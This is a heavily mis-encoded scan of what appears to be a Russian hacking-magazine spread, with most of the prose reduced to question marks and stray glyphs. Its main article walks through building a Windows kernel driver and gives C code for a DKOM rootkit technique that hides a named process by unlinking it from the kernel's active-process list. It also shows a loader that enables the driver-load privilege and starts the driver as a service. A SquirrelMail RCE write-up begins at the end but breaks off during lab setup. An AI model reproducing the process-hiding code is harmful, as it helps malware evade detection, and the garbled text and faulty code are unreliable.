?????:� ????�?� ?� Base64� ?????�???�?� ???�?,� ??� ???????� ??� ????�???�???.
???�?� ???�?� ?� ???,� ???� ???�??� ???�????� ?????� ????� ??� ????�?� 255� ????�
?????.
???�?� ????� ???� ???�??� ?????�????,� ???�?� ?????�???,� ????� ?????�????
??????�?�??????�??.�??�???�???�???�?��,���??�?????�??�???
????,�?�???�??�??�??�??????�????.
/etc/cron.d/indexgen
SHELL=/bin/bash
0,15,30,45�*�*�*�*爎oot�/usr/local/bin/genindex_batch.sh
??�?????�??�??�??�??燩AN?OS
??�????燩oC�?�?????�??�?�??��??.
????????????�?????????�(?????)
??????
???� ?????� ????�??�??� ???�????�?� ???�???� ?� ???�???�???� ??????�???,
???????� ??� ???????� ????�?� ??????�?� ???�??????�??� ???????�????.� ????
?� ???�????�??� ????????�??� ?� ???????�?� ?� ???,� ???� ??????�?,� ???�?????
??�??????�?,��??燽ad爌ractice,�????�??�??????�??�???�?�????�???�?.
???�????,� ?????�??� ???�????� ?� Shodan� ???�?� ????�???� ???�???�?� ?????
?????�?????�??,�??�??�?�??�?????�????.
??�?� ???�?� ?????�???,� ???� ?????�?� ???�????�?� ?????�???�?� ??� ???�?
?????�???�?????�?.� ???� ???�??,� ???� ???�???� ?????� ????�??�???�???�?� ????�
??????.��???�?????,�??�??�??�???,�?�?????�?�????�??�?�????�????
?????�???�??.
???� ??� ?????� ????� ???�???,� ???�?� ??????�?,� ???�?� ????�???�?,� ????
?�??�?�??????�???�?�????�????.
?????
??????
??�???????
Nik燴erof
xtahi0nix@gmail.com
???�??????�???�??????
??????�???燱INDOWS
?�???????�???????
???� ?????????�??� ????�????� ?????�??� ???�???�??,� ????
??� ???�??�?� ???� ????�???�?,� ??????�???� ????�???�??
??????�?????�???�(ring�,�????�??????�?????�?�????�
????�??� ??� ???�???:� ??????� ???�??�??� ??� ?????�????,
????�??� ???�?????� ???????,� ??????�??� ????�??�??
???????�??� ?� ???�?????� ??????�?� ???�???� ?� ???????�??
???�??�??��??�???.�???��???�????�???�????�???�??,
??� ???�?????� ????�???�?� ??� ???� ??� ??????� ????�?????�?
(ring� 3)� ???�???�????.� ???� ??� ???�????�?� ??????�?� ??� ???
??????� ???�??�???�???.� ???????� ?� ????????� ????�???�??
????�??.��???�?????��?????,�??�??�???�???.
INFO
???�??�?????� ????�??�???� x86� ?� x64� ???�?
??????� ????�?� ??????,� ??� ???????� ?� Windows
??� ???�?� ??????�???�?� ???�?� ???� ?� ???� ring� 3
(?????� ????�?????�?)� ?� ring� 0� (?????� ????).
????�?� ???�??,� ???� ???� ??????� ????� ?� ?????
???�???�???�??�??� ?� �???粻 ??????� ???.
??� ?????� ????� ????�??�???� x86/x64� ???�???�?
????�???�?� ???� ????:� ???� ???�??????� ???�?????�
?????�(hypervisor爉ode),�??????�??�???�?�????�
???�1�(ring�1),��????�??�????�?�??????�??
(System� Management� Mode,� SMM),� ???�?????�?
????�??� ?2� (ring� ?2),� ??????�?� ???�????� ??????
??????�???��????�?????.
????,�?�?????�?????�???�???�??�???�??.�??�??��?????�??�??�???�
?????.� ?� ???????� ??????�?????� Microsoft� Visual� Studio,� ???� ?????�??� user?
friendly營DE.�??�?�???�?????�????�???�?????燱indows燬DK�燱indows燚ri?
ver燢it�(WDK)�??�??�?�??�??�?.�??�?�???,��???�?�??????�??�?????�
????� ??????� ???�???�?,� ???� DebugView� (????�???� ????�??�???� ??????),� Dri?
verView� (???�???�?� ????????� ???�??� ????� ????�??�?????� ????�????)� ?� Kmd?
Manager�(????�??�??�?????�???�????).
????�???�燱indows�??????�燰ista�????�???�??�?????�???�?????�?
(User?Mode� Driver� Framework,� UMDF),� ???� ?� ??????� ????� (Kernel?Mode� Driver
Framework,� KMDF).� ?????� ???�??� ????�???� Windows� Driver� Model� (WDM)
?????�???�燱indows���??�??�??�???�?�???�??�???.
????�???� UMDF� ???�?� ???�???� ?????� ????�????�??� ???�?,� ???� KMDF,
????�?�??�?????�???�?,�??�????,�??�??????�??�?????�???�?,�??�???�
???�???�?燯SB.�?????�???�???�??,��??�???�??�??�??�??�?:�?�???�
????�??�?�???�?????,��???�?��?�?????�??�?�??????�??�???�??�???�
??????�???��????�????�???�?.�????�???�???�??�?�??�??????燿ll.
???� ??� ????�????� ??????� ????� (KMDF),� ??� ??� ???�?????� ????� ????�?,
?� ???�??????� ???�??,� ???�?????�??� ??� ????,� ?� ???� sys.� ?� ????� ??????� ??
??????�?� ??????� ????�??� ????�???� ??????� ????,� ???????� ????�??
???� ????�??� ???�??�??� ???????� DKOM� (Direct� Kernel� Object� Manipulation)
?�??�??�?????.
????????�???????燢MDF
???�?�???�??�?�??�???�??�??�???�???,燰isual燬tudio�???�???�??�?�???�
???�?� ??????�??� ???????�?.� ???�??� ?????� ???�?????�???�?� ?� ?????�??
????� ?� ????�???�???� ?� ???,� ?????� ???�???� ???�????�?.� ???� ????�??� ?
???燦ATIVE,�??�????�?�??�???�???�?,�??�??�??�???,�??�?�?????�????�
????.
???�?�??�?��???�??
????�?�?????,�??�?�??�?��???�??�????�???�????��?�????�???
??�???�?????,�??????��??????�??�??�????�?�??�???�entry:[Driver?
Entry],�??� [DriverEntry]��??�????�??�???,�??????�?�????�??�???
????�????.� ????� ?� ????�??� ???�???�???� ????????� ???�???� ????�?� ???????�
????爉ain,�?��???�????�??�?�??�?�??�???�???????燚riverEntry.
???�?????�??�????�??:
NTSTATUS燚riverEntry�(PDRIVER_OBJECT爌DriverObject,燩UNICODE_STRING�
pRegistryPath);
??�??� ????�??�?� ??� ???????�??,� ???????� ??????�???� DriverEntry.
pDriverObject� ???�?� ???� PDRIVER_OBJECT,� ???� ???�??,� ???� ???� ???�?????
??�????�???� DRIVER_OBJECT,�??????�????�??�??????�??��????�????�
????.� ??� ?????� ??????� ??????�??� ????� ????� ?????�???,� ???� ?????� ?????
????�???� ????�???.� ???�??� ????????� ???�?� ???� PUNICODE_STRING,� ???????
????�???�??�?????�?�???�?�???� UNICODE.�??,��???�??�???,�??�???�?,
???��??�?????�???�??�??�??�?�??????�??��????�???�???.
WARNING
??�??� ????�?� ?� ????�???� ?????� ???�???� ?????�
???�?????� ????� ?� BSOD.� ????�???� ??????� ????�
???��??�????�??�??�???.�??�????�????�?�
???????�??�??�?????��??�????�??�?????.
Interrupt燫equest燣evel�(IRQL)
IRQL� ?� ???� ???�??�?????� �??�??�??粻 ???� ????�????.� ???� ????� IRQL,� ???
????�??�??�?�??�??�???�????�????�??�?????�????�????�?????�???.
?????�??�?� ???�???�?� ????�??� IRQL:� Passive,� APC,� Dispatch� ?� DIRQL.� ????
???????� ???????�????� MSDN� ??� ???�??�?� WinAPI,� ??� ???�?� ???�???� ????�
????�??,� ???????� ???�????�???�?� ???�???� IRQL,� ???????� ???�???�?
???� ????�????� ?� ???�??� ???�???.� ???� ????� ????� ???�???,� ???� ????�?
WinAPI� ???� ???�????� ???� ??????�??????.� ???�??� ???� ????�?� IRQL� ???????�
????�?�??�??�??�???�??�???�??�???�??�??�?,�??�???燚IRQL�??�???�?
????�??�??��????�??????�?�???�????��???�??�??�?�???�???.
??�???�??�???�??�????????�(Input/Output燫equest燩acket)
IRP��??�??�???,�??????�??�???�?��???�???.�???�?�??�?????營RP
????� ????�??� ?????� �??�?????粻 ???�???� ??????� ???�??� ????�??� ????
????????�??�??�?�???�????,�??????�?�??????�?.營RP�?????�???�?�???�
?????�??� ???�????????� ??.� ???�?� ???????� ????�????� ???�??�?????� ????
IRP,� ??� ???�??� ???????�??�?????� ???�???� ???????�?� ??????� ?� ???�??�??
??�??�??�??�??�???�??�?�??�???.�??�???�?�????:
for(x��爔�營RP_MJ_MAXIMUM_FUNCTION;�++x)
牋爌DriverObject?>MajorFunction[x]�燤yCallbackFunc;
?�??�??�??�???????�????,�??????�???�?�??�??�???�??�??�??�??� STA?
TUS_SUCCESS.��???�??�???�?�???�???�???�??�??營RP.
NTSTATUS燤yCallbackFunk(PDEVICE_OBJECT爌DeviceObject,燩IRP爌Irp)
{
牋爌Irp?>IoStatus.Status�燬TATUS_SUCCESS;
牋營oCompleteRequest(pIrp,營O_NO_INCREMENT);
牋爎eturn爌Irp?>IoStatus.Status;
}
??�???�????�??�??��?????�???�???�??????�??�???????�????,�??????
????�?�??�??�???燬TATUS_SUCCESS.�?�??,�???�??�??�?�??�?????�????�
???� ???�???� ??????� ???�???�??,� ???�????� ???�???� ????�????�??� ???�????
???�??�?�????�??�???�??????�???�??�???�?:
#define營RP_MY_FUNC�801
?????� ??� ???�??�?� ???�???�?� ?� ???�??� IRP_MY_FUNC� ?� ??� ?????� ?� 0x801.
???�?� ????�??� ??� ????�????,� ??� ???�??� ???�??�??� ??� ???� ????�?,� ???�??
?????�???�??�????�?????�??�??�?�??�?��???�??:
//�???????�??�???營RP�??????�?�???????????????
for(x��爔�營RP_MJ_MAXIMUM_FUNCTION;�++x)
牋爌DriverObject?>MajorFunction[x]�燤yCallbackFunc;
//�???????�????�??????燤yCallbackControl�?�?????營RP_MJ_DEVICE_C
ONTROL
pDriverObject?>MajorFunction[IRP_MJ_DEVICE_CONTROL]�燤yCall
backControl;
???�?� ???�?� ???� ???�?� ????????� ???�?????� ??� ????� IRP,� ???????� ??� ?????
????�???�???.� ???� ????�???� ???� ??????� ???�???� IoGetCurrentIrpStack?
Location,�?�???�??????�???�???�??�?????�?�????.�??�?�??�?,�????�
??????� ?????� ????????� ??� ???�????�?� ???�????????� ???�???� ???????� ????�
?????????,�??�?�????�??�???????�?????�???��???????�??�??�?�????�
????????�??�?� ???�???�??.� ???�?????� ???� ???�???� ????�??�???� ????????�
????�??�???�?:
//�???????�????????�?�???營RP�?????
PIO_STACK_LOCATION爌IrpSt�營oGetCurrentIrpStackLocation(pIrp);
//�???????�?????�?????�????
ULONG營nBufLen牋=營rpStack?>Parameters.DeviceIoControl.InputB
ufferLength;
//�???????�?????�?????�?????
ULONG燨utBufLen�營rpStack?>Parameters.DeviceIoControl.Output
BufferLength;
//�???????�??�??????????�????????
ULONG燙trlCode�營rpStack?>Parameters.DeviceIoControl.IoControlCode;
NTSTATUS爏tatus�燬TATUS_SUCCESS;
swich(CtrlCode)
{
case營RP_MY_FUNC:
牋�//�????�??,�??????�????�?????????�??????????�?????????�
IRP_MY_FUNC
break;
default:
牋爏tatus�燬TATUS_INVALID_DEVICE_REQUEST;
break;
}
return爏tatus;
???�????�?????�???�???�???
???�?�??�??�??�???�???��???�????,�?�??�??�??�???牜???�??????????�
????�???�???�.�??�??�?�?????�???燗PI????�???� IoCreateDevice.�??�?
????,� ??� ???�????� ???�??????�??� ????�?� ??� ???� ????�??,� ???�?� ??� ???
?????��??�????�?�??�????????��????�????� \Device.�???�??�?�?�???�
????,� ??� ????�???�?� ?� ???�??????????�???� ????�???� ???�?� ?????� ????�?
??� ??????� ????�???,� ??� ??� ??� ????�???� ???�???�??.� ???� ???,� ???????� ????�
????�??�?????????�???�???�???��??�??????�??�???�?�?�???.
#define燦T_DEV_NAME燣"\\Device\\drv_dkom"
#define燚OS_DEV_NAME燣"\\DosDevices\\drv_dkom"
NTSTATUS爏tatus�燬TATUS_SUCCESS;
PDEVICE_OBJECT爌DvcObj�燦ULL;
UNICODE_STRING爑sDrvName,爑sDosDvcName;
RtlInitUnicodeString(&usDrvName,燦T_DEV_NAME);
RtlInitUnicodeString(&usDosDvcName,DOS_DEV_NAME);
status�營oCreateDevice�(pDriverObject,�
牋牋牋牋牋牋牋牋牋牋牋牋&UsDrvName,
牋牋牋牋牋牋牋牋牋牋牋牋FILE_DEVICE_UNKNOWN,
牋牋牋牋牋牋牋牋牋牋牋牋FILE_DEVICE_SECURE_OPEN,
牋牋牋牋牋牋牋牋牋牋牋牋FALSE,�&pDvcObj);
if�(!NT_SUCCESS(status))爗
牋爎eturn爏tatus;
}
status�營oCreateSymbolicLink(&usDosDvcName,�&usDrvName);
if�(!NT_SUCCESS(status))爗
牋營oDeleteDevice(pDvcObj);
牋爎eturn爏tatus;
}
????,� ??� ???�???�???� ????????� ?????�?????� ???�???� ????�???� ??????
????,� ???�???,� ???� ????�??� ????�???� ?� ???????� usermode� ?� ???� ???�?????
???�????�???�???�????�??�????�?.�?????�??????�??�???�??�?????
????.
???????�????????�??????燚KOM�(DIRECT燢ERNEL燨BJECT
MANIPULATION)
???�???� ???�?� ???�?????� ???????�??� ???�??� ?� ????�????� ??????� ????
??�???�???�??�??�????�??�?????�???.�??�??�?�??????�???�??燢MDF
???� ????�??� ???�??�??� ???????� ???�??� ??????�????� ???�???�?� ????
(DKOM).�??�???�?�?�????�???�???�???�??�??�??�??????�??��???�
???�??� ???�??�?� ?� ?????�???� ????� ???� ???�???�?� EPROCESS,� ???� ???� ?????�
???�?��??.
INFO
?????�???� EPROCESS,� ????� ???�??�?.� ?� ???
?????�????� ???�?� ???????�??� ?� ???�??�?,� ????�
????�?� ??� ???�???�?� ?????�??� ???�??,� ???�????
PEB,� ?????�???� KPROCESS,� ?????�???� KTHREAD
?� ETHREAD.� ???� ?????�???� ?????�???�?� ????????�
????�??� ???�????� ??,� ???????�?� ?� ???�?????
????????� ????�????�??� (kernelmode),� ???� ?� ???
???�??�??� ?????�???,� ???�?� PEB.� ???� ???�??�?
???�?�??�????�???.
???�?� ???�???� EPROCESS� ?????�??????�?,� ???�????�?� ???�??�???�?� ?????�
???� ???????�??� WinDbg� ?� ????� ??� ?� ????�?� ?????�?� dt� _EPROCESS.� ???�?
???�?�?�??�???�?????�??�?�??�?�(???�????�???�???�?��??�??�??�???
????燱indows):
lkd>燿t燺EPROCESS
nt!_EPROCESS
+0x000燩cb牋牋牋牋牋牋牋:燺KPROCESS
+0x2d8燩rocessLock牋牋牋:燺EX_PUSH_LOCK
+0x2e0燫undownProtect牋�燺EX_RUNDOWN_REF
+0x2e8燯niqueProcessId牋:燩tr64燰oid
+0x2f0燗ctiveProcessLinks�燺LIST_ENTRY
+0x300燜lags2牋牋牋牋牋�燯int4B
+0x300燡obNotReallyActive�燩os��it
+0x300燗ccountingFolded�燩os��it
+0x300燦ewProcessReported�燩os��it
+0x300燛xitProcessReported�燩os��it
+0x300燫eportCommitChanges�燩os��it
+0x300燣astReportMemory�燩os��it
+0x300燜orceWakeCharge牋:燩os��it
+0x300燙rossSessionCreate�燩os��it
+0x300燦eedsHandleRundown�燩os��it
+0x300燫efTraceEnabled牋:燩os��it
+0x300燚isableDynamicCode�燩os�,�it
+0x300燛mptyJobEvaluated�燩os�,�it
...
??�???�???,� ???� ??� ???� ?????�???,� ???� ???�???�?� ????�?.� ????????� ???????�
????�??�????�????�???�?????�?�?????�????�???燛PROCESS.��??�??
????�???�?�??�???�?�????.� ActiveProcessLinks��??�?????�?�????�???
_LIST_ENTRY,�??????,��???�??�???,�??�???�?�?�??�??�?�??�?�?????
(FLink)��????�(BLink).�??�?�???�????�??,�??�??�????燺LIST_ENTRY:
typedef爏truct燺LIST_ENTRY爗
牋爏truct燺LIST_ENTRY�*FLink;
牋爏truct燺LIST_ENTRY�*BLink;
}燣IST_ENTRY,�*PLIST_ENTRY;
???�???,�???�??�??��??�????�?�?????�???�?:
lkd>燿t燺LIST_ENTRY
nt!_LIST_ENTRY
+0x000燜link牋牋牋牋牋牋:燩tr64燺LIST_ENTRY
+0x008燘link牋牋牋牋牋牋:燩tr64燺LIST_ENTRY
???�?�??�???????�?,�???�?????��??�???�??�???�?�??�?�???�?,�???�
??�??�???�??�?????�??.��???�??�??,�??�??�???�?????� BLink�� FLink
?????� ????�??,� ???�?� ???� �??�??�???粻 ???�??� ???�???.� ???� ???�?� ????�
?????�??�??�??�???��???�???�?�?�??�??�??燩ID�,�???�??�??�??,
???????�??�???�?????�????燘Link�燜Link.燩ID�?�??�?�????�???????
??� ?????�???� EPROCESS,� ???�??� ????� ??????�???� UniqueProcessID.
???� ??????�??� ???�?� EPROCESS� ???�???�???�?� ???�??�?� PsGetCurrent?
Process,�??????�??�??�??�?????�?�???.
//�??????�?????�???????,�????????�??燱indows�爔64
#define燯niqueProcessId�2e8
#define燗ctiveProcessLinks�2f0
#define營mageFileName�450
#define營RP_HIDE_PROC�801
#define燦T_DEV_NAME燣"\\Device\\drv_dkom"
#define燚OS_DEV_NAME燣"\\DosDevices\\drv_dkom"
NTSTATUS燚riverEntry�(PDRIVER_OBJECT牋pDriverObject,燩UNICODE_STRING�
pRegPath)
{
牋�//�???????�?????????�???????��???????�????????????�?????
牋燦TSTATUS爏tatus�燬TATUS_SUCCESS;
牋燩DEVICE_OBJECT爌DvcObj�燦ULL;
牋燯NICODE_STRING爑sDrvName,爑sDosDvcName;
牋燫tlInitUnicodeString(&usDrvName,燦T_DEV_NAME);
牋燫tlInitUnicodeString(&usDosDvcName,燚OS_DEV_NAME);
牋爏tatus�營oCreateDevice(pDriverObject,�
牋牋牋牋牋牋牋牋牋牋牋牋牋�&usDrvName,
牋牋牋牋牋牋牋牋牋牋牋牋牋燜ILE_DEVICE_UNKNOWN,
牋牋牋牋牋牋牋牋牋牋牋牋牋燜ILE_DEVICE_SECURE_OPEN,
牋牋牋牋牋牋牋牋牋牋牋牋牋燜ALSE,�&pDvcObj);
牋爄f�(!NT_SUCCESS(status))爗
牋牋牋爎eturn爏tatus;
牋爙
牋爏tatus�營oCreateSymbolicLink(&usDosDvcName,�&usDrvName);
牋爄f�(!NT_SUCCESS(status))爗
牋牋牋營oDeleteDevice(pDvcObj);
牋牋牋爎eturn爏tatus;
牋爙
牋�//�???????營RP�?�???????????????,�???�???????�??????�
???????��??????�???????�???????
牋�//�???????�??�???營RP�??????�?�???????????????
牋爄nt爔;
牋爁or�(x��爔�營RP_MJ_MAXIMUM_FUNCTION;�++x)
牋牋牋爌DriverObject?>MajorFunction[x]�燤yCallbackFunk;
牋爌DriverObject?>MajorFunction[IRP_MJ_DEVICE_CONTROL]�燤yCont
rolHide;牋//�????????�????�??????燤yCallbackControl�?�?????�
IRP_MJ_DEVICE_CONTROL
牋爌DriverObject?>DriverUnload�燚rvUnload;
牋爎eturn爏tatus;
}
VOID燚rvUnload(PDRIVER_OBJECT牋pDriverObject)爗
牋�//�???????:�??????�????????????�?????��?????????
牋營oDeleteSymbolicLink(&usDosDvcName);
牋營oDeleteDevice(pDriverObject?>DeviceObject);
}
NTSTATUS燤yCallbackFunk(PDEVICE_OBJECT爌DeviceObject,燩IRP爌Irp)
{
牋爌Irp?>IoStatus.Status�燬TATUS_SUCCESS;
牋營oCompleteRequest(pIrp,營O_NO_INCREMENT);
牋爎eturn爌Irp?>IoStatus.Status;
}
NTSTATUS燤yControlHide(PDEVICE_OBJECT爌devObj,燩IRP爌Irp)
{
牋�//�???????�????????�?�???營RP�?????
牋燩IO_STACK_LOCATION爌IrpSt�營oGetCurrentIrpStackLocation(pIrp);
牋�//�???????�?????�?????�????
牋燯LONG營nBufLen�爌IrpSt?>Parameters.DeviceIoControl.InputB
ufferLength;
牋�//�???????�?????�?????�?????
牋燯LONG燨utBufLen�爌IrpSt?>Parameters.DeviceIoControl.Output
BufferLength;
牋�//�???????�??�??????????�????????
牋燯LONG燙trlCode�爌IrpSt?>Parameters.DeviceIoControl.IoControlCode
;
牋燦TSTATUS爏tatus�燬TATUS_SUCCESS;
牋爏witch(CtrlCode){
牋燾ase營RP_HIDE_PROC:
牋牋牋營nBufLen�爌Irp?>AssociatedIrp.SystemBuffer;
牋牋牋爌Irp?>IoStatus.Information�爏trlen(InBufLen);
牋牋牋爃ide_proc(InBufLen);
牋燽reak;
牋燿efault:
牋牋牋爏tatus�燬TATUS_INVALID_DEVICE_REQUEST;
牋燽reak;
牋爙
牋爎eturn爏tatus;
}
VOID爃ide_proc(char�*pc)
{
牋�//�???????????�???燜Link�燘Link
牋燩EPROCESS燾urrentProc��(PEPROCESS)PsGetCurrentProcess();
牋燩EPROCESS爏tartProc��(PEPROCESS)PsGetCurrentProcess();
牋燩LIST_ENTRY燼ctiveProcLinks;
牋燩UCHAR爌ImageFileName;
牋燩UINT32爌PidProc;
牋爁or�(;�((DWORD64)startProc�!=�(DWORD64)currentProc);)
牋爗
牋牋牋爌ImageFileName��(PUCHAR)((DWORD64)currentProc�+營mageF
ileName);
牋牋牋爌PidProc��(PUINT32)((DWORD64)currentProc�+燯niqueProcessId);
牋牋牋燼ctiveProcLinks��(PLIST_ENTRY)((DWORD64)currentProc�+燗ctive
ProcessLinks);
牋牋牋爏tartProc��(PEPROCESS)((DWORD64)activeProcLinks?>Flink��
ActiveProcessLinks);
牋牋牋爄f�(!strcmp((const燾har*)pImageFileName,燭EXT(pc)))爗
牋牋牋牋牋�*((PDWORD64)activeProcLinks?>Blink)��(DWORD64)active
ProcLinks?>Flink;
牋牋牋牋牋�*((PDWORD64)(activeProcLinks?>Flink)�+���(DWORD64)
activeProcLinks?>Blink;
牋牋牋牋牋燼ctiveProcLinks?>Blink��(PLIST_ENTRY)&activeProcLinks?>
Flink;
牋牋牋牋牋燼ctiveProcLinks?>Flink��(PLIST_ENTRY)&activeProcLinks?>
Flink;
牋牋牋爙
牋爙
}
??�??� ????�??�??� ???�???�??� ?� ???�???� hide_proc,� ???�??� ?� ??� ???�?:� ??
????�??� ????�?????� ???�??� ?� ??????�???�?� ????� FLink� ?� BLink.� ?� ???�?
?????�?�??????�??�???�????�????.�?????�????�??��?�????�??�???
???�???� ?� ???�????� ???????�???� ????�????� ???� ??????� ????�???.� ???
???�??�??�?????�???�??��?????�???�??�????�?.
???�?????�???�????
???�?????�???�??��???�??�?�??�???�???�??�???�?,�????�??????�??
??� ???� ?� ???� ???�????� ???� ??????� SCM� (Service� Control� Manager)� ?� ???
??????� NTAPI????�???� NtLoadDriver.� ??� ???????� ???�??� ????�??,
???� ???????�????�??� Microsoft� ?� ???????�???� ???� ??� ???�??� ????????
??????�????:�???????�?????�?�??�??�???�???�?燬ervice燙ontrol燤anag?
er.�?�??�?????�??????�??�??�??�???�??:
BOOL爏etPrivileges(LPCTSTR爏zPrivName)
{
牋燭OKEN_PRIVILEGES爐p�爗�;
牋燞ANDLE爃Token��
牋爐p.PrivilegeCount��
牋爐p.Privileges[0].Attributes�燬E_PRIVILEGE_ENABLED;
牋爄f�(!OpenProcessToken(GetCurrentProcess(),燭OKEN_ADJUST_PR
IVILEGES,�&hToken))
牋牋牋爏td::cout�<�"OpenProcessToken爁ailed\n";
牋爄f�(!LookupPrivilegeValue(NULL,爏zPrivName,�&tp.Privileges[0].
Luid))
牋牋牋爏td::cout�<�"LookupPrivilegeValue爁ailed\n";
牋爄f�(!AdjustTokenPrivileges(hToken,燜ALSE,�&tp,爏izeof(tp),燦ULL,�
NULL))
牋爗
牋牋牋爏td::cout�<�"AdjustTokenPrivileges爁ailed\n";
牋牋牋燙loseHandle(hToken);
牋牋牋爎eturn燭RUE;
牋爙
牋爎eturn燜ALSE;
}
??�??�??�???:
setPrivileges("SeLoadDriverPrivilege");
???�?� ???�?� ?????�??�???� ????�??� ?� ???�???� (???�??�?� ??� ??????????
???????�???�????�???�??�??�??�??�???�???�?�???):
//�???��?????�???????
#define燚RV�"c:\\\\Windows\\System32\\drivers\\dkomdrv.sys"
//�??�??????
#define燬RV�"dkomdrv"
//�??�?????????
#define燚VC�"\\\\.\\dkomdrv"
//�??,�????????�???????�?????�??????
#define營RP_HIDE_PROC�801
SC_HANDLE爃SCMgr,hSrv;
HANDLE爃Dvc;
//�????????燬CM
hSCMgr�燨penSCManager(NULL,燦ULL,燬C_MANAGER_ALL_ACCESS);
//�??????�?????
hSrv�燙reateService(
牋爃SCManager,
牋燭EXT(SRV),
牋燭EXT(SRV),
牋燬C_MANAGER_ALL_ACCESS,
牋燬ERVICE_KERNEL_DRIVER,
牋燬ERVICE_DEMAND_START,
牋燬ERVICE_ERROR_IGNORE,
牋燭EXT(DRV),
牋燦ULL,燦ULL,燦ULL,燦ULL,燦ULL
);
//�????????�?????
StartService(hSrv,�燦ULL);
????,�???�??�???�??�??��??????.�?????�????�??�??:�?�??�??�???�
????� ????�???� ???????�???� ???,� ???????� ???�????� ???� ??????� ???�??� ???
???�???�(??�???�???�??????�??爌id):
hDvc�燙reateFile(
牋燭EXT(DEVICE),
牋燝ENERIC_READ爘燝ENERIC_WRITE,
牋�
牋燦ULL,
牋燨PEN_EXISTING,
牋燜ILE_ATTRIBUTE_NORMAL,
牋燦ULL
);
BOOLEAN爐otal�燚eviceIoControl(
牋爃Device,
牋營RP_HIDE_PROC,牋//�??�??????????�??
牋爌id,
牋爏trlen(pid)�+�
牋爎etbuf,
牋�0,
牋�&bytes_returned,
牋�(LPOVERLAPPED)燦ULL
);
???�?�??�?�??�?�??�???�??�????�??�??�??,�???�??�?�???????�???�
???�?� ????????�?� ???????� ???�???,� ??� ?� ?????� ???� ???� ??????,� ???�?� ??
?????�??�??�??�?????�???�????�??�????�??�??�????��??????�??�????�
?????,� ??� ?????�????� ??� ??� ???.� ???�?� ?????�????� ???�?� ????� ???�??� ????�
????� ????????� ??� ???�????�?� ?????� ?� ??� ????�???�??� ???�???�??,� ???????
??????�?��??�??�???.
?????
??�???�???�???��??????�?�?????�??,�??????�??�?�????��???�????
??????� ????,� ?� ???�???� ????�???�??� ????�??,� ????�?????� ???�??�?
???????燚KOM.�?????�???,�??�???�?�????�?????�???��??�????�????�
?????,�?��????�?????�???�???�??�????�????��?�???�???�????�?
?????� ???�?.� ??� ???�?� ??????� ????�???�??� ?????�????�?,� ???�?� ???�??.
???�?????,�?????�???�???�???�?�??�???�?,�??�??�?�???????�?!
?????
aLLy
ONsec
@iamsecurity
??????�??????????????
?????�?????????
?�????????燬QUIRRELMAIL
???
?????????
?????
?� ???�????� ???�???� SquirrelMail� ???�???� ???�??�??� ????�
???????,�,�???�??�?????�?�????,�?????�?�???�???�?
???�???�??:� ?????� ????�???????� ?????� ??????� ???� ???�???
???�?????�??�??�?��??�???.�?�????�??�??�?�??�???�
????�??燬quirrelMail,�??�??�??�??��????�?�????�?�???�
?????�?,� ?� ???�????�???� ???� ??� ?� ??� ?????�???.� ?????� ????�
??????,�???�?�??�????�?��??�?�??�??�??�?????.
???�?� ???� ?????� ?� ??�??� ?� ???�??� ???�????�?� SquirrelMail� ?� ???�?� ????� ???
??� RCE,� ?� ????�???� ????� ?� ?????�??�???� ????�??�??� ???????�??,� ???????
??????�???�?� ?????�???� sendmail.� ?????� ?????� ???�?� ???�?,
?� ???� 2017� ????,� ?????�???�???� ??� TROOPERS18� ???�???� ???�??� (Florian
Grunow)� ????�????� ???� ????� ???�????�??� ???�??????� ?� ????� ??� ???�??�?.
??� ???� ???� ????�???� ???�?????� ?� ???�???� ????�????�??� ???�??� ?� ?????�
?????,� ?� ????????� ???�??�??�??� ???�???�?� ???�????�?� ??????� ???�?
??�??????�??�???.
???�??� ?????� ???� ??� ???�??????� ???????�??� ?� ???�??�??� ???�????�?,
???�??,�???�?�??�???.�???�?�??�????�???�?�??�??�??�?�?�??�????�
????� ???� ????�???.� ???�????� ?� ?????�???�???� ???�?????,� ?� ??� ??�????
???????�??��??�?????�??�??.
???�??????????�?????????
???�???????�?� ???�????� ?????.� ???�????� ???�???� ?� ???� ?????� ???� ????�
????�??,�??�????�????�??????�???�???�??�??????�+3��??????�????�
???�??�???�??.� ???� ???�?� ???�?????� ???�??,� ?� ???� ???�??????� ?� ???�???
??� ????�???.� ??????� ????� ???�??� ???�??� Docker� ?????� ????????.� ????
??� ??????� ??????�?� ?� ???�???�??,� ??� ?????� ???????� ???�??�??� ??� ??�??
??????�????��?????�?��??�????�?�???�?.
??�??�???�????��???�??�???�?�???�??????�????�??�????.
docker爎un�ti�p80:80�?rm�?name=squirrel�?hostname=squirrel�
debian�/bin/bash
apt?get爑pdate�&&燼pt?get爄nstall�y爏endmail爓get爊ano燼pache2�
dovecot?core燿ovecot?imapd爌hp
???�???�?� ????� ??� ???�?????� ???�??�???�??� SquirrelMail.� ????�?� ???�?
?????� ????� ?????�???�???�??,� ???� ???� ???�????�???� ???�???�?� ???????�?
????�?,�??�??�??�???�??�??�???�?.
install�d�/usr/local/src/downloads
cd�/usr/local/src/downloads
wget爃ttp://prdownloads.sourceforge.net/squirrelmail/squirr
elmail?webmail?1.4.22.tar.gz
mkdir�/usr/local/squirrelmail
cd�/usr/local/squirrelmail
mkdir燿ata爐emp燼ttach
chown爓ww?data:www?data燿ata爐emp燼ttach
tar爔vzf�/usr/local/src/downloads/squirrelmail?webmail?1.4.22.tar.gz
mv爏quirrelmail?webmail?1.4.22爓ww
??�???� ???�?� ???�???� ???�?????�???�??� ????� ???� Squirrel.� ???� ????� ?????
?????�??�?�??�?????�??.
www/configure
???� ??� ???�??�?� ??????� ????�??� ????�??�???????� ?????�???� ???�??????�
????�??�???爓ww/config/config_default.php.
???� ???� ????�??,� ???� ?� ???� ???�?� ???�???,� ?� ???� ????,� ??� ???????� ?????
???�???????�?� ???�??�??� ???�?,� ?� ???� ???�?� ????�????�???� ?� ????�??.
??�???�????�???�????:
1.燚ata燚irectory:�/var/local/squirrelmail/data/.
2.燗ttachment燚irectory:�/var/local/squirrelmail/attach/.
??�???�?��???�???�???��????�??�?????�???�????.
sed�"s/domain��'example.com'/domain��'visualhack'/;爏#/var/local/
squirrelmail/#/usr/local/squirrelmail/#g"�/usr/local/squirrelmail/
www/config/config_default.php��/usr/local/squirrelmail/www/config/
config.php
????�???�???� ?� ?????�??� ???�??� ?� ???�???�?� ???�????� ???�????.� ????�
????�?,�????�??�???�?�????�?????�?????.
echo�"protocols�爄map"��/etc/dovecot/dovecot.conf
???�???�?�???�???�??�?�??�?�??????.
echo燶!include燼uth?passwdfile.conf.ext��/etc/dovecot/conf.d/
10?auth.conf
??�???� ???????� ???�?� ?� dovecot,� ???� ???� ???� ????????� ???�??�??�??� ????�
